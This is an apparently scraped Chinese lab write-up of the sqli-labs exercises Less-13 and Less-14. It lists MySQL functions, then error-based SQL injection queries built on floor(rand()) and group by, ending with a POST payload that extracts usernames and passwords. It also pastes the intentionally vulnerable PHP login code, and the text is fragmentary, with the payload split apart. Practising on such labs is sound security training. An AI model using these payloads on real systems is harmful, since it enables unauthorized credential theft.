Less-13&14

来源：互联网发布：星际争霸mac版编辑：程序博客网时间：2024/06/09 21:50

use near '''') and password=('') LIMIT 0,1' at line 1
select * from table where username = ('inputuser') and password = ('inputpassword')

基础知识
user（）用户名；current_user()当前用户名
session_user() 连接数据库的用户名 @@hostname 主机名
database() 数据库名 @@port 数据库端口名
version() MySQL数据库版本 version_complile_os 操作系统
@@datatir数据库路径 basedir MySQL安装路径
floor（）向下取整
rand（）0-1之间随机的一个数
select count(*),(concat("~",current_user,"~",floor(rand()*2)))name from information_schema.tables group by name;
select count(*),concat("~",database(),"~",floor(rand()*2))name from information_schema.tables group by name;
select count(*),concat("~",(select table_name from information_schema.tables where table_schema=database()limit 0,1),"~",floor(rand()*2))name from information_schema.tables group by name
select count(*),concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2))name from information_schema.tables group by name
select 1 from ()name

uname=123') and (select 1 from (select count(*),(concat("~",concat((select username from users limit 1,1),";;",(select password from users limit 1,1)),"~",floor(rand()*2)))name from information_schema.tables group b

if(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname."\n");fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in " ;echo '<font size="3" color="#0000ff">';echo "<br>";//echo 'Your Login name:'. $row['username'];//echo "<br>";//echo 'Your Password:' .$row['password'];//echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"   />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg"   />';echo "</font>";  }}?>

y name)b)#&passwd=123&submit=Submit
Less 14
use near '""" and password="" LIMIT 0,1' at line 1
....

0 0